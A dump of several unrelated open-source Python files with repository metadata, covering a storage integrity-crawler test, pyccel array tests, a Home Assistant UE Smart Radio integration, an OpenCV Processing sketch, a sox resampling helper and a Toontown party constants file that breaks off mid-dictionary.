super(TestIntegrityCrawler, self).tearDown()
os.remove(self.rebuild_file)
self.storage.container_flush(self.account, self.container)
self.storage.container_delete(self.account, self.container)
self.wait_for_event(
"oio-preserved",
types=[EventTypes.CONTAINER_DELETED],
fields={"user": self.container},
)
try:
self.storage.account_delete(self.account)
except exceptions.Conflict:
pass # Yes I know, that's not supposed to fail, but...
def _verify_rebuilder_input(self):
try:
line = next(fileinput.input(self.rebuild_file)).strip()
cid = cid_from_name(self.account, self.container)
expected = "|".join(
[
cid,
self.meta["id"],
self.meta["name"],
self.meta["version"],
self.chunk["url"],
]
)
if self.irreparable:
expected = IRREPARABLE_PREFIX + "|" + expected
self.assertEqual(expected, line)
finally:
fileinput.close()
def test_account_rebuilder_output(self):
self.checker.check(Target(self.account), recurse=DEFAULT_DEPTH)
for _ in self.checker.run():
pass
self.checker.fd.flush()
self._verify_rebuilder_input()
def test_container_rebuilder_output(self):
self.checker.check(
Target(self.account, container=self.container), recurse=DEFAULT_DEPTH
)
for _ in self.checker.run():
pass
self.checker.fd.flush()
self._verify_rebuilder_input()
def test_object_rebuilder_output(self):
self.checker.check(
Target(self.account, container=self.container, obj=self.obj),
recurse=DEFAULT_DEPTH,
)
for _ in self.checker.run():
pass
self.checker.fd.flush()
self._verify_rebuilder_input()
def test_object_rebuilder_output_with_confirmations(self):
"""
Check that chunk targets showing errors are reported only after
the right number of confirmations.
"""
self.checker.required_confirmations = 2
tgt = Target(
self.account,
container=self.container,
obj=self.obj,
content_id=self.meta["id"],
version=self.meta["version"],
)
self.checker.check(tgt, recurse=DEFAULT_DEPTH)
for _ in self.checker.run():
pass
self.checker.fd.flush()
# File is empty
self.assertRaises(StopIteration, self._verify_rebuilder_input)
self.assertIn(repr(tgt), self.checker.delayed_targets)
# 1st confirmation
for dtgt in self.checker.delayed_targets.values():
self.checker.check(dtgt, recurse=DEFAULT_DEPTH)
for _ in self.checker.run():
pass
self.checker.fd.flush()
# File is empty
self.assertRaises(StopIteration, self._verify_rebuilder_input)
self.assertIn(repr(tgt), self.checker.delayed_targets)
# 2nd confirmation
for dtgt in self.checker.delayed_targets.values():
self.checker.check(dtgt, recurse=DEFAULT_DEPTH)
for _ in self.checker.run():
pass
self.checker.fd.flush()
# File is NOT empty
self._verify_rebuilder_input()
self.assertNotIn(repr(tgt), self.checker.delayed_targets)
|
5c49a0d301fd4875a6eefcef521d2271cbccba12
|
e8b38b8dfa348ff006eb197a7906ca8e491a23dc
|
/tests/pyccel/scripts/array_binary_operation.py
|
652e53bb716ca2e17a50a8ba717cd6ba582370f5
|
[
"MIT"
] |
permissive
|
pyccel/pyccel
|
d79a81dbdff1172839a6a1227abfcc1f97e6c97b
|
1896b761ba662c90b14c195bbb6eb5cddc57cbfc
|
refs/heads/devel
| 2023-08-30T12:15:25.244401
| 2023-08-28T09:31:32
| 2023-08-28T09:31:32
| 100,463,736
| 307
| 39
|
MIT
| 2023-09-14T19:29:26
| 2017-08-16T07:59:14
|
Python
|
UTF-8
|
Python
| false
| false
| 2,928
|
py
|
array_binary_operation.py
|
# pylint: disable=missing-function-docstring, missing-module-docstring
import numpy as np
def my_pow(n : 'int', m : 'int'):
return n ** m
def array_func_mult():
arr = np.array([1,2,3,4])
arr1 = arr * my_pow(2, 3)
shape = np.shape(arr1)
return arr[0], arr1[0], len(shape), shape[0]
def array_func_div():
arr = np.array([1,2,3,4])
arr1 = arr / my_pow(2, 3)
shape = np.shape(arr1)
return arr[0], arr1[0], len(shape), shape[0]
def array_arithmetic_op_func_call_1():
arr = np.array([1,2,3,4])
arr1 = np.array(arr * 2)
shape = np.shape(arr1)
return arr[0], arr1[0], len(shape), shape[0]
def array_arithmetic_op_func_call_2():
arr = np.array([1,2,3,4])
arr1 = np.array(arr / 2)
shape = np.shape(arr1)
return arr[0], arr1[0], len(shape), shape[0]
def array_arithmetic_op_func_call_3():
arr = np.array([1,2,3,4])
arr1 = np.array(arr * my_pow(2, 2))
shape = np.shape(arr1)
return arr[0], arr1[0], len(shape), shape[0]
def array_arithmetic_op_func_call_4():
arr = np.array([1,2,3,4])
arr1 = np.array(arr / my_pow(2, 2) + arr * 2)
shape = np.shape(arr1)
return arr[0], arr1[0], len(shape), shape[0]
def array_arithmetic_op_func_call_5():
arr = np.array([1,2,3,4])
arr1 = np.where(arr > 5, arr, (arr * 2) + arr)
shape = np.shape(arr1)
return arr[0], arr1[0], len(shape), shape[0]
def array_arithmetic_op_func_call_6():
arr = np.array([1,2,3,4])
arr1 = np.where(arr < 5, arr / 2, arr * 2)
shape = np.shape(arr1)
return arr[0], arr1[0], len(shape), shape[0]
def array_arithmetic_op_func_call_7():
arr = np.array([1,2,3,4])
arr1 = np.array([4,3,2,1])
arr2 = np.array(arr + arr1)
shape = np.shape(arr2)
return arr[0], arr2[0], len(shape), shape[0]
def array_arithmetic_op_func_call_8():
arr = np.array([1,2,3,4])
arr1 = np.array([4,3,2,1])
arr2 = np.array(arr - arr1)
shape = np.shape(arr2)
return arr[0], arr2[0], len(shape), shape[0]
if __name__ == "__main__":
a_0, a1_0, ls_0, s_0 = array_func_mult()
print(a_0, a1_0, ls_0, s_0)
a_1, a1_1, ls_1, s_1 = array_func_div()
print(a_1, a1_1, ls_1, s_1)
a_2, a1_2, ls_2, s_2 = array_arithmetic_op_func_call_1()
print(a_2, a1_2, ls_2, s_2)
a_3, a1_3, ls_3, s_3 = array_arithmetic_op_func_call_2()
print(a_3, a1_3, ls_3, s_3)
a_4, a1_4, ls_4, s_4 = array_arithmetic_op_func_call_3()
print(a_4, a1_4, ls_4, s_4)
a_5, a1_5, ls_5, s_5 = array_arithmetic_op_func_call_4()
print(a_5, a1_5, ls_5, s_5)
a_6, a1_6, ls_6, s_6 = array_arithmetic_op_func_call_5()
print(a_6, a1_6, ls_6, s_6)
a_7, a1_7, ls_7, s_7 = array_arithmetic_op_func_call_6()
print(a_7, a1_7, ls_7, s_7)
a_8, a1_8, ls_8, s_8 = array_arithmetic_op_func_call_7()
print(a_8, a1_8, ls_8, s_8)
a_9, a1_9, ls_9, s_9 = array_arithmetic_op_func_call_8()
print(a_9, a1_9, ls_9, s_9)
|
f3629e590412fb6edb8ee7aa9cb082753222e4a6
|
96dcea595e7c16cec07b3f649afd65f3660a0bad
|
/homeassistant/components/ue_smart_radio/media_player.py
|
7fc727cf9fea1a8cee9dc1cb0c97e8f2670ae9de
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/core
|
3455eac2e9d925c92d30178643b1aaccf3a6484f
|
80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743
|
refs/heads/dev
| 2023-08-31T15:41:06.299469
| 2023-08-31T14:50:53
| 2023-08-31T14:50:53
| 12,888,993
| 35,501
| 20,617
|
Apache-2.0
| 2023-09-14T21:50:15
| 2013-09-17T07:29:48
|
Python
|
UTF-8
|
Python
| false
| false
| 6,049
|
py
|
media_player.py
|
"""Support for Logitech UE Smart Radios."""
from __future__ import annotations
import logging
import requests
import voluptuous as vol
from homeassistant.components.media_player import (
PLATFORM_SCHEMA,
MediaPlayerEntity,
MediaPlayerEntityFeature,
MediaPlayerState,
MediaType,
)
from homeassistant.const import CONF_PASSWORD, CONF_USERNAME
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
_LOGGER = logging.getLogger(__name__)
ICON = "mdi:radio"
URL = "http://decibel.logitechmusic.com/jsonrpc.js"
PLAYBACK_DICT = {
"play": MediaPlayerState.PLAYING,
"pause": MediaPlayerState.PAUSED,
"stop": MediaPlayerState.IDLE,
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{vol.Required(CONF_USERNAME): cv.string, vol.Required(CONF_PASSWORD): cv.string}
)
def send_request(payload, session):
"""Send request to radio."""
try:
request = requests.post(
URL,
cookies={"sdi_squeezenetwork_session": session},
json=payload,
timeout=5,
)
except requests.exceptions.Timeout:
_LOGGER.error("Timed out when sending request")
except requests.exceptions.ConnectionError:
_LOGGER.error("An error occurred while connecting")
else:
return request.json()
def setup_platform(
hass: HomeAssistant,
config: ConfigType,
add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the Logitech UE Smart Radio platform."""
email = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
session_request = requests.post(
"https://www.uesmartradio.com/user/login",
data={"email": email, "password": password},
timeout=5,
)
session = session_request.cookies["sdi_squeezenetwork_session"]
player_request = send_request({"params": ["", ["serverstatus"]]}, session)
players = [
UERadioDevice(session, player["playerid"], player["name"])
for player in player_request["result"]["players_loop"]
]
add_entities(players)
class UERadioDevice(MediaPlayerEntity):
"""Representation of a Logitech UE Smart Radio device."""
_attr_icon = ICON
_attr_media_content_type = MediaType.MUSIC
_attr_supported_features = (
MediaPlayerEntityFeature.PLAY
| MediaPlayerEntityFeature.PAUSE
| MediaPlayerEntityFeature.STOP
| MediaPlayerEntityFeature.PREVIOUS_TRACK
| MediaPlayerEntityFeature.NEXT_TRACK
| MediaPlayerEntityFeature.TURN_ON
| MediaPlayerEntityFeature.TURN_OFF
| MediaPlayerEntityFeature.VOLUME_SET
| MediaPlayerEntityFeature.VOLUME_MUTE
)
def __init__(self, session, player_id, player_name):
"""Initialize the Logitech UE Smart Radio device."""
self._session = session
self._player_id = player_id
self._attr_name = player_name
self._attr_volume_level = 0
self._last_volume = 0
def send_command(self, command):
"""Send command to radio."""
send_request(
{"method": "slim.request", "params": [self._player_id, command]},
self._session,
)
def update(self) -> None:
"""Get the latest details from the device."""
request = send_request(
{
"method": "slim.request",
"params": [
self._player_id,
["status", "-", 1, "tags:cgABbehldiqtyrSuoKLN"],
],
},
self._session,
)
if request["error"] is not None:
self._attr_state = None
return
if request["result"]["power"] == 0:
self._attr_state = MediaPlayerState.OFF
else:
self._attr_state = PLAYBACK_DICT[request["result"]["mode"]]
media_info = request["result"]["playlist_loop"][0]
self._attr_volume_level = request["result"]["mixer volume"] / 100
self._attr_media_image_url = media_info["artwork_url"]
self._attr_media_title = media_info["title"]
if "artist" in media_info:
self._attr_media_artist = media_info["artist"]
else:
self._attr_media_artist = media_info.get("remote_title")
@property
def is_volume_muted(self) -> bool:
"""Boolean if volume is currently muted."""
return self.volume_level is not None and self.volume_level <= 0
def turn_on(self) -> None:
"""Turn on specified media player or all."""
self.send_command(["power", 1])
def turn_off(self) -> None:
"""Turn off specified media player or all."""
self.send_command(["power", 0])
def media_play(self) -> None:
"""Send the media player the command for play/pause."""
self.send_command(["play"])
def media_pause(self) -> None:
"""Send the media player the command for pause."""
self.send_command(["pause"])
def media_stop(self) -> None:
"""Send the media player the stop command."""
self.send_command(["stop"])
def media_previous_track(self) -> None:
"""Send the media player the command for prev track."""
self.send_command(["button", "rew"])
def media_next_track(self) -> None:
"""Send the media player the command for next track."""
self.send_command(["button", "fwd"])
def mute_volume(self, mute: bool) -> None:
"""Send mute command."""
if mute:
self._last_volume = self.volume_level
self.send_command(["mixer", "volume", 0])
else:
self.send_command(["mixer", "volume", self._last_volume * 100])
def set_volume_level(self, volume: float) -> None:
"""Set volume level, range 0..1."""
self.send_command(["mixer", "volume", volume * 100])
|
fb3426adc951ea2cd0cbc454de06b576838ca701
|
100bfa827dacb23637d3dd2d1396a830c7d9a4b2
|
/mode/examples/Contributed Libraries in Python/OpenCV/BackgroundSubtraction/BackgroundSubtraction.pyde
|
1a3fc9440555b5d1f6548a705cb0d63650dc7ce1
|
[
"Apache-2.0"
] |
permissive
|
jdf/processing.py
|
82b37e5b1f4ce68825b5fe919205362ecdc16993
|
f38544c70892c7534f059e8acc1c9a492e2b7c86
|
refs/heads/master
| 2023-08-26T01:42:50.442853
| 2023-02-15T21:33:12
| 2023-02-15T21:33:12
| 833,574
| 1,399
| 246
|
Apache-2.0
| 2023-02-21T12:28:09
| 2010-08-12T14:29:22
|
Python
|
UTF-8
|
Python
| false
| false
| 572
|
pyde
|
BackgroundSubtraction.pyde
|
add_library('video')
add_library('opencv_processing')
video = None
opencv = None
def setup():
size(720, 480, P2D)
video = Movie(this, "street.mov")
opencv = OpenCV(this, 720, 480)
opencv.startBackgroundSubtraction(5, 3, 0.5)
video.loop()
video.play()
def draw():
image(video, 0, 0)
opencv.loadImage(video)
opencv.updateBackground()
opencv.dilate()
opencv.erode()
noFill()
stroke(255, 0, 0)
strokeWeight(3)
for contour in opencv.findContours():
contour.draw()
def movieEvent(m):
m.read()
|
65c6b120f5d38d960ad682ea1c0d72b0cd0959f4
|
da769d44cfb931914ff51c0f1f302b056837c388
|
/elpis/engines/common/input/resample.py
|
b45f07b6434708b8c264fef11e5438ca36ae6e36
|
[
"Apache-2.0"
] |
permissive
|
CoEDL/elpis
|
d7ef5d8c5daf450df10ca57371291d953555eaa7
|
9a019483b4440a96f80486142fb53c7b95c8f983
|
refs/heads/master
| 2023-07-08T05:06:13.276450
| 2023-03-09T00:17:37
| 2023-03-09T00:17:37
| 154,595,187
| 142
| 40
|
Apache-2.0
| 2023-09-05T09:41:13
| 2018-10-25T02:00:37
|
Python
|
UTF-8
|
Python
| false
| false
| 432
|
py
|
resample.py
|
import subprocess
from ..utilities.globals import SOX_PATH
from pathlib import Path
def resample(src_path: Path, dst_path: Path):
src_path = Path(src_path)
dst_path = Path(dst_path)
sox_arguments = [
SOX_PATH,
f"{src_path}",
"-b",
"16",
"-c",
"1",
"-r",
"16k",
"-t",
"wav",
f"{dst_path}",
]
subprocess.call(sox_arguments)
|
33447977a7bb2a40fce92716bcc1c9ceb19cb889
|
da1721d2783ea4d67ff4e73cee6eee71292f2ef7
|
/toontown/parties/PartyGlobals.py
|
895e54a7b43b27c388be9242609465e090ac2e0b
|
[
"BSD-3-Clause"
] |
permissive
|
open-toontown/open-toontown
|
bbdeb1b7bf0fb2861eba2df5483738c0112090ca
|
464c2d45f60551c31397bd03561582804e760b4a
|
refs/heads/develop
| 2023-07-07T01:34:31.959657
| 2023-05-30T23:49:10
| 2023-05-30T23:49:10
| 219,221,570
| 143
| 104
|
BSD-3-Clause
| 2023-09-11T09:52:34
| 2019-11-02T22:24:38
|
Python
|
UTF-8
|
Python
| false
| false
| 37,853
|
py
|
PartyGlobals.py
|
from panda3d.core import BitMask32
from panda3d.core import Point3, VBase4
from toontown.toonbase import TTLocalizer
from enum import IntEnum
KICK_TO_PLAYGROUND_EVENT = 'parties_kickToPlayground'
MaxSetInvites = 1000
MaxSetPartiesInvitedTo = 100
MaxSetHostedParties = 50
MaxPlannedYear = 2030
MinPlannedYear = 1975
JellybeanMultiplier = 1.5
JellyBeanDayMultiplier = 2
PARTY_DURATION = 1800.0
EventsPageGuestNameMaxWidth = 0.42
EventsPageGuestNameMaxLetters = 18
EventsPageHostNameMaxWidth = 0.37
PartyRefundPercentage = 0.95
PartyPlannerAsapMinuteRounding = 5
UberdogCheckPartyStartFrequency = 5.0
UberdogPurgePartyPeriod = 24.0
UberdogPartiesSanityCheckFrequency = 60
JarLabelTextColor = (0.95,
0.95,
0.0,
1.0)
JarLabelMaxedTextColor = (1.0,
0.0,
0.0,
1.0)
TuftsOfGrass = 75
MaxToonsAtAParty = 20
DefaultPartyDuration = 0.5
DelayBeforeAutoKick = 30.0
MaxHostedPartiesPerToon = 1
PartyEditorGridBounds = ((-0.11, 0.289), (0.55, -0.447))
PartyEditorGridCenter = (PartyEditorGridBounds[0][0] + (PartyEditorGridBounds[1][0] - PartyEditorGridBounds[0][0]) / 2.0, PartyEditorGridBounds[1][1] + (PartyEditorGridBounds[0][1] - PartyEditorGridBounds[1][1]) / 2.0)
PartyEditorGridSize = (18, 15)
PartyEditorGridSquareSize = ((PartyEditorGridBounds[1][0] - PartyEditorGridBounds[0][0]) / float(PartyEditorGridSize[0]), (PartyEditorGridBounds[0][1] - PartyEditorGridBounds[1][1]) / float(PartyEditorGridSize[1]))
PartyEditorGridRotateThreshold = 0.08
AvailableGridSquares = 202
TrashCanPosition = (-0.24, 0.0, -0.65)
TrashCanScale = 0.7
PartyEditorTrashBounds = ((-0.16, -0.38), (-0.05, -0.56))
ActivityRequestStatus = IntEnum('ActivityRequestStatus', ('Joining', 'Exiting'), start=0)
InviteStatus = IntEnum('InviteStatus', ('NotRead',
'ReadButNotReplied',
'Accepted',
'Rejected'), start=0)
InviteTheme = IntEnum('InviteTheme', ('Birthday',
'GenericMale',
'GenericFemale',
'Racing',
'Valentoons',
'VictoryParty',
'Winter'), start=0)
PartyStatus = IntEnum('PartyStatus', ('Pending',
'Cancelled',
'Finished',
'CanStart',
'Started',
'NeverStarted'), start=0)
AddPartyErrorCode = IntEnum('AddPartyErrorCode', ('AllOk',
'ValidationError',
'DatabaseError',
'TooManyHostedParties'), start=0)
ChangePartyFieldErrorCode = IntEnum('ChangePartyFieldErrorCode', ('AllOk',
'ValidationError',
'DatabaseError',
'AlreadyStarted',
'AlreadyRefunded'), start=0)
ActivityTypes = IntEnum('ActivityTypes', ('HostInitiated', 'GuestInitiated', 'Continuous'), start=0)
PartyGateDenialReasons = IntEnum('PartyGateDenialReasons', ('Unavailable', 'Full'), start=0)
ActivityIds = IntEnum('ActivityIds', ('PartyJukebox',
'PartyCannon',
'PartyTrampoline',
'PartyCatch',
'PartyDance',
'PartyTugOfWar',
'PartyFireworks',
'PartyClock',
'PartyJukebox40',
'PartyDance20',
'PartyCog',
'PartyVictoryTrampoline',
'PartyWinterCatch',
'PartyWinterTrampoline',
'PartyWinterCog',
'PartyValentineDance',
'PartyValentineDance20',
'PartyValentineJukebox',
'PartyValentineJukebox40',
'PartyValentineTrampoline'), start=0)
PartyEditorActivityOrder = [ActivityIds.PartyCog,
ActivityIds.PartyWinterCog,
ActivityIds.PartyJukebox,
ActivityIds.PartyJukebox40,
ActivityIds.PartyValentineJukebox,
ActivityIds.PartyValentineJukebox40,
ActivityIds.PartyCannon,
ActivityIds.PartyTrampoline,
ActivityIds.PartyValentineTrampoline,
ActivityIds.PartyVictoryTrampoline,
ActivityIds.PartyWinterTrampoline,
ActivityIds.PartyCatch,
ActivityIds.PartyWinterCatch,
ActivityIds.PartyDance,
ActivityIds.PartyDance20,
ActivityIds.PartyValentineDance,
ActivityIds.PartyValentineDance20,
ActivityIds.PartyTugOfWar,
ActivityIds.PartyFireworks,
ActivityIds.PartyClock]
UnreleasedActivityIds = ()
MutuallyExclusiveActivities = ((ActivityIds.PartyJukebox, ActivityIds.PartyJukebox40),
(ActivityIds.PartyValentineJukebox, ActivityIds.PartyValentineJukebox40),
(ActivityIds.PartyDance, ActivityIds.PartyDance20),
(ActivityIds.PartyValentineDance, ActivityIds.PartyValentineDance20))
VictoryPartyActivityIds = frozenset([ActivityIds.PartyVictoryTrampoline])
VictoryPartyReplacementActivityIds = frozenset([ActivityIds.PartyTrampoline])
WinterPartyActivityIds = frozenset([ActivityIds.PartyWinterCatch, ActivityIds.PartyWinterTrampoline, ActivityIds.PartyWinterCog])
WinterPartyReplacementActivityIds = frozenset([ActivityIds.PartyCatch, ActivityIds.PartyTrampoline, ActivityIds.PartyCog])
ValentinePartyActivityIds = frozenset([ActivityIds.PartyValentineDance,
ActivityIds.PartyValentineDance20,
ActivityIds.PartyValentineJukebox,
ActivityIds.PartyValentineJukebox40,
ActivityIds.PartyValentineTrampoline])
ValentinePartyReplacementActivityIds = frozenset([ActivityIds.PartyDance,
ActivityIds.PartyDance20,
ActivityIds.PartyJukebox,
ActivityIds.PartyJukebox40,
ActivityIds.PartyTrampoline])
DecorationIds = IntEnum('DecorationIds', ('BalloonAnvil',
'BalloonStage',
'Bow',
'Cake',
'Castle',
'GiftPile',
'Horn',
'MardiGras',
'NoiseMakers',
'Pinwheel',
'GagGlobe',
'BannerJellyBean',
'CakeTower',
'HeartTarget',
'HeartBanner',
'FlyingHeart',
'Hydra',
'BannerVictory',
'CannonVictory',
'CogStatueVictory',
'TubeCogVictory',
'CogIceCreamVictory',
'cogIceCreamWinter',
'StageWinter',
'CogStatueWinter',
'snowman',
'snowDoodle',
'BalloonAnvilValentine'), start=0)
DECORATION_VOLUME = 1.0
DECORATION_CUTOFF = 45
VictoryPartyDecorationIds = frozenset([DecorationIds.Hydra,
DecorationIds.BannerVictory,
DecorationIds.CannonVictory,
DecorationIds.CogStatueVictory,
DecorationIds.TubeCogVictory,
DecorationIds.CogIceCreamVictory])
WinterPartyDecorationIds = frozenset([DecorationIds.cogIceCreamWinter,
DecorationIds.StageWinter,
DecorationIds.CogStatueWinter,
DecorationIds.snowman,
DecorationIds.snowDoodle])
VictoryPartyReplacementDecorationIds = frozenset([DecorationIds.BannerJellyBean])
ValentinePartyDecorationIds = frozenset([DecorationIds.BalloonAnvilValentine,
DecorationIds.HeartBanner,
DecorationIds.HeartTarget,
DecorationIds.FlyingHeart])
ValentinePartyReplacementDecorationIds = frozenset([DecorationIds.BalloonAnvil, DecorationIds.BannerJellyBean])
UnreleasedDecorationIds = ()
GoToPartyStatus = IntEnum('GoToPartyStatus', ('AllowedToGo',
'PartyFull',
'PrivateParty',
'PartyOver',
'PartyNotActive'), start=0)
PlayGroundToPartyClockColors = {'the_burrrgh': (53.0 / 255.0,
116.0 / 255.0,
148.0 / 255.0,
1.0),
'daisys_garden': (52.0 / 255.0,
153.0 / 255.0,
95.0 / 255.0,
1.0),
'donalds_dock': (60.0 / 255.0,
98.0 / 255.0,
142.0 / 255.0,
1.0),
'donalds_dreamland': (79.0 / 255.0,
92.0 / 255.0,
120.0 / 255.0,
1.0),
'minnies_melody_land': (128.0 / 255.0,
62.0 / 255.0,
142.0 / 255.0,
1.0),
'toontown_central': (77.0 / 255.0,
137.0 / 255.0,
52.0 / 255.0,
1.0)}
PartyGridUnitLength = [14.4, 14.6]
PartyGridHeadingConverter = 15.0
PartyGridToPandaOffset = (-PartyGridUnitLength[0] * PartyEditorGridSize[0] / 2.0, -PartyGridUnitLength[1] * PartyEditorGridSize[1] / 2.0)
PartyCostMultiplier = 1
MinimumPartyCost = 100 * PartyCostMultiplier
ActivityInformationDict = {ActivityIds.PartyJukebox: {'cost': int(50 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': False,
'gridAsset': 'PartyJukebox_activity_1x1'},
ActivityIds.PartyJukebox40: {'cost': int(100 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': False,
'gridAsset': 'PartyJukebox_activity_1x1'},
ActivityIds.PartyValentineJukebox: {'cost': int(50 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': False,
'gridAsset': 'PartyJukebox_activity_1x1'},
ActivityIds.PartyValentineJukebox40: {'cost': int(100 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': False,
'gridAsset': 'PartyJukebox_activity_1x1'},
ActivityIds.PartyCannon: {'cost': int(50 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 5,
'limitPerParty': 10,
'paidOnly': False,
'gridAsset': 'PartyCannon_activity_1x1'},
ActivityIds.PartyTrampoline: {'cost': int(50 * PartyCostMultiplier),
'gridsize': (2, 2),
'numberPerPurchase': 1,
'limitPerParty': 8,
'paidOnly': False,
'gridAsset': 'PartyTrampoline_activity_2x2'},
ActivityIds.PartyValentineTrampoline: {'cost': int(50 * PartyCostMultiplier),
'gridsize': (2, 2),
'numberPerPurchase': 1,
'limitPerParty': 8,
'paidOnly': False,
'gridAsset': 'PartyTrampoline_activity_2x2'},
ActivityIds.PartyVictoryTrampoline: {'cost': int(50 * PartyCostMultiplier),
'gridsize': (2, 2),
'numberPerPurchase': 1,
'limitPerParty': 8,
'paidOnly': False,
'gridAsset': 'PartyTrampoline_activity_2x2'},
ActivityIds.PartyWinterTrampoline: {'cost': int(50 * PartyCostMultiplier),
'gridsize': (2, 2),
'numberPerPurchase': 1,
'limitPerParty': 8,
'paidOnly': False,
'gridAsset': 'PartyTrampoline_activity_2x2'},
ActivityIds.PartyCatch: {'cost': int(300 * PartyCostMultiplier),
'gridsize': (5, 5),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': True,
'gridAsset': 'PartyCatch_activity_5x5'},
ActivityIds.PartyWinterCatch: {'cost': int(300 * PartyCostMultiplier),
'gridsize': (5, 5),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': True,
'gridAsset': 'PartyCatch_activity_5x5'},
ActivityIds.PartyCog: {'cost': int(300 * PartyCostMultiplier),
'gridsize': (5, 5),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': True,
'gridAsset': 'PartyCog_activity_5x5'},
ActivityIds.PartyWinterCog: {'cost': int(300 * PartyCostMultiplier),
'gridsize': (5, 5),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': True,
'gridAsset': 'PartyCog_activity_5x5'},
ActivityIds.PartyDance: {'cost': int(100 * PartyCostMultiplier),
'gridsize': (3, 3),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': True,
'gridAsset': 'PartyDance_activity_3x3'},
ActivityIds.PartyDance20: {'cost': int(200 * PartyCostMultiplier),
'gridsize': (3, 3),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': True,
'gridAsset': 'PartyDance_activity_3x3'},
ActivityIds.PartyValentineDance: {'cost': int(100 * PartyCostMultiplier),
'gridsize': (3, 3),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': True,
'gridAsset': 'PartyDance_activity_3x3'},
ActivityIds.PartyValentineDance20: {'cost': int(200 * PartyCostMultiplier),
'gridsize': (3, 3),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': True,
'gridAsset': 'PartyDance_activity_3x3'},
ActivityIds.PartyTugOfWar: {'cost': int(200 * PartyCostMultiplier),
'gridsize': (4, 4),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': False,
'gridAsset': 'PartyTufOfWar_activity_4x4'},
ActivityIds.PartyFireworks: {'cost': int(200 * PartyCostMultiplier),
'gridsize': (4, 2),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': False,
'gridAsset': 'PartyFireworks_activity_2x4'},
ActivityIds.PartyClock: {'cost': MinimumPartyCost,
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': False,
'gridAsset': 'PartyClock_activity_1x1'}}
DecorationInformationDict = {DecorationIds.BalloonAnvil: {'cost': int(10 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.BalloonAnvilValentine: {'cost': int(10 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.BalloonStage: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.Bow: {'cost': int(10 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.Cake: {'cost': int(10 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.Castle: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.GiftPile: {'cost': int(10 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.Horn: {'cost': int(10 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.MardiGras: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.NoiseMakers: {'cost': int(10 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.Pinwheel: {'cost': int(10 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.GagGlobe: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.BannerJellyBean: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.CakeTower: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.HeartTarget: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.HeartBanner: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
